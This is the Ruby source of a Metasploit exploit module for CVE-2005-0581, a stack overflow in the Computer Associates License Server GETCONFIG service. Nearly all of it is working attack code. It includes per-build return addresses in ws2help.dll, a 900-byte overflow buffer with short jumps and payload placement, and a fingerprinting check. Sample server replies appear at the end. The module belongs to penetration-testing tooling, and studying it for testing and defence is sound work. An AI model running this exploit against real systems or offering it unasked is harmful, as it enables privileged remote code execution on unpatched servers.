modules/exploits/windows/license/calicserv_getconfig.rb

Summary

Maintainability
A
3 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

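class MetasploitModule < Msf::Exploit::Remote
  # Normal: return addresses are hard-coded per OS/service-pack build and
  # there is no automatic target selection (see the Targets table below).
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Stack overflow in the CA License Server network service (CVE-2005-0581).
  # One oversized GETCONFIG request overwrites the stack; control is
  # regained through "jmp esi" / "jmp edi" trampolines in ws2help.dll,
  # which is why each target entry is tied to one exact Windows build.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Computer Associates License Server GETCONFIG Overflow',
      'Description' => %q{
          This module exploits an vulnerability in the CA License Server
        network service. By sending an excessively long GETCONFIG
        packet the stack may be overwritten.
      },
      'Author' =>
        [
          'hdm', # original msf v2 module
          'aushack', # msf v3 port :)
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2005-0581' ],
          [ 'OSVDB', '14389' ],
          [ 'BID', '12705' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
        ],
      # Module metadata states that the payload runs with elevated privileges
      # (the context of the license service itself).
      'Privileged' => true,
      'DefaultOptions' =>
        {
          # The smashed stack cannot be resumed cleanly, so the payload
          # terminates the whole service process rather than just its thread.
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          # 272 + 600 stays inside the 900-byte buffer built in #exploit.
          'Space' => 600,
          # 0x20 is the field separator of the "A0 GETCONFIG SELF ..." line;
          # 0x00 presumably terminates the copied string early.
          'BadChars' => "\x00\x20",
          # Move ESP well below the payload so its own stack use does not
          # overwrite the payload bytes.
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # As much as I would like to return back to the DLL or EXE,
          # all of those modules have a leading NULL in the
          # loaded @ address :(
          # name, jmp esi, writable, jmp edi
          #['Automatic', {} ],
          #
          # aushack - tested OK Windows XP English SP0-1 only 20100214
          # Other entries are untested by the porter; a wrong pick most
          # likely crashes the service instead of returning a session.
          ['Windows 2000 English',    { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP0-1',    { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP2',    { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
          ['Windows 2003 English SP0',    { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
        ],
      'DisclosureDate' => '2005-03-02'))

    register_options(
      [
        Opt::RPORT(10202),
      ])
  end

  # Fingerprint the service with a benign (non-overflowing) GETCONFIG request.
  #
  # This only proves that something answering like a CA License Server is
  # listening; it does not test for the overflow, and the VERSION field of
  # the reply is not inspected, so a patched server that still answers would
  # be reported as Detected too.
  #
  # @return [Exploit::CheckCode] Detected when the reply carries an OS<...>
  #   field, Unknown when nothing came back at all, Safe otherwise.
  def check
    connect
    sock.get_once # greeting; not needed for the fingerprint
    sock.put("A0 GETCONFIG SELF 0<EOM>")
    res = sock.get_once || ''

    # No reply says nothing about the target; don't call it Safe.
    return Exploit::CheckCode::Unknown if res.empty?

    if res =~ /OS\<([^\>]+)/
      vprint_status("CA License Server reports OS: #{Regexp.last_match(1)}")
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  ensure
    # Always release the socket, even when put/get raised.
    disconnect
  end

  # Send the overflow and wait for the payload handler.
  #
  # Buffer layout (900 bytes of alphanumeric filler, offsets as in the
  # original module; two service builds are hit at once because each of
  # them returns into one of the two trampolines):
  #   142 -> short jmp over the two addresses that follow
  #   144 -> target ret 0 ("jmp esi"), used when ESI points into the buffer
  #   148 -> target ret 1 (writable address, keeps a later write from faulting)
  #   194 -> short jmp over the address that follows
  #   196 -> target ret 2 ("jmp edi"), used when EDI points at buffer start
  #   272 -> encoded payload (Payload Space 600 keeps it inside the buffer)
  #   928 -> SEH handler, which the 900-byte buffer never reaches
  #          (not useful under XP SP2 anyway)
  def exploit
    connect
    banner = sock.get_once
    # An unexpected greeting usually means this is not the CA License
    # Server; the overflow is still sent, so warn loudly first.
    unless banner.to_s.include?('GETCONFIG')
      print_warning("The server did not return the expected greeting!")
    end

    buff = rand_text_alphanumeric(900)
    buff[142, 2] = Rex::Arch::X86.jmp_short(8)       # jmp over the two addresses
    buff[144, 4] = [target['Rets'][0]].pack('V')     # jmp esi
    buff[148, 4] = [target['Rets'][1]].pack('V')     # writable address
    buff[194, 2] = Rex::Arch::X86.jmp_short(4)       # jmp over the address
    buff[196, 4] = [target['Rets'][2]].pack('V')     # jmp edi
    buff[272, payload.encoded.length] = payload.encoded

    sock.put("A0 GETCONFIG SELF #{buff}<EOM>")

    handler
  ensure
    # Runs after the handler as before, and also when put/connect raised.
    disconnect
  end
end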

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end